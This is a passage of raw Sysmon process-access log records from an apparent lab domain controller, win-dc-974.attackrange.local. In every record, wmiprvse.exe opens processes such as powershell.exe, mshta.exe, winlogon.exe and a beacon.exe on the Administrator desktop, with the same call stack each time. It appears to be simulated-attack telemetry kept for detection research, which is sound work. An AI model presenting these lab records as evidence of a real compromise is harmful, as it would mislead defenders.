16:58:30.483{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.468{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 